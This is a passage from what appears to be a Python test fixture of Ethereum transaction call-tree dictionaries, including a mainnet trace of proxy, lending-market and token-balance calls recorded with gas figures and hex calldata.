"gas_cost": 52079,
"calldata": HexBytes("0x7007cbe8"),
"returndata": HexBytes(
"0x000000000000000000000000000000000293b0e3558d33b8a4c483e40e2b8db9000000000000000000000000000000000000000000000000018b932eebcc7eb90000000000000000000000000000000000bf550935e92f79f09e3530df8660c5"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": "c",
"value": 0,
"depth": 2,
"gas_limit": 49071,
"gas_cost": 48306,
"calldata": HexBytes(
"0x878fb7010000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000006f000000000000000000000000f2df0b975c0c9efa2f8ca0491c2d1685104d2488000000000000000000000000000000000000000000000000000000000000000773696d706c657200000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
MAINNET_CALL_TREE_DICT = {
"call_type": CallType.CALL,
"address": HexBytes("0xf14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 1362033,
"gas_cost": 1070997,
"calldata": HexBytes(
"0x1cff79cd000000000000000000000000533c8844ba1922b88d892aca090df0cc0c292f1b00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000ac4f708847b00000000000000000000000000000000000000000000000000000000000000800000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000067a4a5343b74de28cc000000000000000000000000000003ba0319533c578527ae69bf7fa2d289f20b9b55c00000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef00000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000068b0a6df6d303ae8900000000000000000000000000000000000000000000000000000000000000000008e8a6c3bf330000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000000000000000000078000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000026000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c0000000000000000000000000000000000000000000000000000000000000064000000000000000000000000000000000000000000000000000000000000006a000000000000000000000000000000000000000000000000000000000000006a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002640810b1f010301d000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4c8876573a792d8faba391a985b937c96dfe336f8022285a4e5d5fa2b07c3eef9834600000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000420000000000000000000000000000000000000000000000000000000000000048000000000000000000000000000000000000000000000000000000000000004800000000000000000000000000000000000000000000000000000000000000224dc1600f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000dcd6011f4c6b80e470d9487f5871a0cba7c93f48000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000002640810b1f010301d0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000002000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff10300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010400000000000000000000000000000000000000000000000000000000000000869584cd000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e0800000000000000000000000000000000000000000000003cf9caf5925fb4ac6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x0000000000000000000000000000000000000000000000000000000000000000"),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x533c8844ba1922b88d892aca090df0cc0c292f1b"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 1311551,
"gas_cost": 1041213,
"calldata": HexBytes(
"0xf708847b00000000000000000000000000000000000000000000000000000000000000800000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000067a4a5343b74de28cc000000000000000000000000000003ba0319533c578527ae69bf7fa2d289f20b9b55c00000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef00000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000068b0a6df6d303ae8900000000000000000000000000000000000000000000000000000000000000000008e8a6c3bf330000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000000000000000000078000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000026000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c0000000000000000000000000000000000000000000000000000000000000064000000000000000000000000000000000000000000000000000000000000006a000000000000000000000000000000000000000000000000000000000000006a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002640810b1f010301d000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4c8876573a792d8faba391a985b937c96dfe336f8022285a4e5d5fa2b07c3eef9834600000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000420000000000000000000000000000000000000000000000000000000000000048000000000000000000000000000000000000000000000000000000000000004800000000000000000000000000000000000000000000000000000000000000224dc1600f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000dcd6011f4c6b80e470d9487f5871a0cba7c93f48000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000002640810b1f010301d0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000002000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff10300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010400000000000000000000000000000000000000000000000000000000000000869584cd000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e0800000000000000000000000000000000000000000000003cf9caf5925fb4ac67000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x0000000000b3f879cb30fe243b4dfee438691c04"),
"value": 0,
"depth": 0,
"gas_limit": 1286820,
"gas_cost": 1303,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 1283749,
"gas_cost": 118577,
"calldata": HexBytes(
"0x5ec88c79000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001538bb6679b4a8dee8ac0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 1261921,
"gas_cost": 116582,
"calldata": HexBytes(
"0x5ec88c79000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001538bb6679b4a8dee8ac0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 1235205,
"gas_cost": 7747,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003437612e40a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a5acfef01d00971b81cbd9"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1224101,
"gas_cost": 2843,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000001ac09e6fd9f7658000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 1215968,
"gas_cost": 20072,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 1194674,
"gas_cost": 16646,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0xbb8be4772faa655c255309afc3c5207aa7b896fd"
),
"value": 0,
"depth": 0,
"gas_limit": 1173557,
"gas_cost": 13461,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 1149779,
"gas_cost": 1215,
"calldata": HexBytes(
"0x0bebac860000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000120826dfebe6c4e87c468e0"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 1146980,
"gas_cost": 1093,
"calldata": HexBytes("0xc92aecc4"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000034a13ac9ed2cf6900e592bb"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1192732,
"gas_cost": 2931,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000df84bed7768e000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 1184512,
"gas_cost": 16641,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 1163710,
"gas_cost": 13215,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x338f7e5d19d9953b76dd81446b142c2d9fe03482"
),
"value": 0,
"depth": 0,
"gas_limit": 1143076,
"gas_cost": 10030,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x1f9840a85d5af5bf1d1762f925bdaddc4201f984"
),
"value": 0,
"depth": 0,
"gas_limit": 1119822,
"gas_cost": 1497,
"calldata": HexBytes(
"0x70a0823100000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000acca862cc8349fcf261ae"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1164653,
"gas_cost": 3635,
"calldata": HexBytes(
"0xfc57d4df00000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000033a760c1363e2000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 1155738,
"gas_cost": 19027,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf38faf10000000000000000000000000000000000000000000000000000b93ff48f0b5300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 1135843,
"gas_cost": 16924,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf38faf10000000000000000000000000000000000000000000000000000b93ff48f0b53"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x976aa93ca5aaa569109f4267589c619a097f001d"
),
"value": 0,
"depth": 0,
"gas_limit": 1115645,
"gas_cost": 13739,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf38faf10000000000000000000000000000000000000000000000000000b93ff48f0b53"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 1090088,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1133531,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 1165313,
"gas_cost": 3073,
"calldata": HexBytes("0x7dc0d1d0"),
"returndata": HexBytes(
"0x000000000000000000000000922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 1145341,
"gas_cost": 1105,
"calldata": HexBytes("0x7dc0d1d0"),
"returndata": HexBytes(
"0x000000000000000000000000922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 1160557,
"gas_cost": 42845,
"calldata": HexBytes("0xa6afed95"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x976aa93ca5aaa569109f4267589c619a097f001d"),
"value": 0,
"depth": 0,
"gas_limit": 1140614,
"gas_cost": 40830,
"calldata": HexBytes("0xa6afed95"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 1119359,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xfb564da37b41b2f6b6edcc3e56fbf523bd9f2012"
),
"value": 0,
"depth": 0,
"gas_limit": 1112112,
"gas_cost": 3858,
"calldata": HexBytes(
"0x15f240530000000000000000000000000000000000000000000000000000088ee804439c00000000000000000000000000000000000000000000000000001d139311c1b90000000000000000000000000000000000000000000000000000001b12fec2d4"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000044a45c5a9"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x922018674c12a7f0d394ebeef9b58f186cde13c1"),
"value": 0,
"depth": 0,
"gas_limit": 1116647,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 1112144,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a082310000000000000000000000003dfd23a6c5e8bbcfc9581d2e864a68feb6a076d3"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000006ab9ba43b69"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 1107301,
"gas_cost": 7351,
"calldata": HexBytes(
"0xc2998238000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000020000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 1088212,
"gas_cost": 5335,
"calldata": HexBytes(
"0xc2998238000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000020000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0xf14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
"value": 0,
"depth": 0,
"gas_limit": 1097815,
"gas_cost": 1247,
"calldata": HexBytes("0x8da5cb5b"),
"returndata": HexBytes(
"0x0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 1094726,
"gas_cost": 118577,
"calldata": HexBytes(
"0x5ec88c79000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
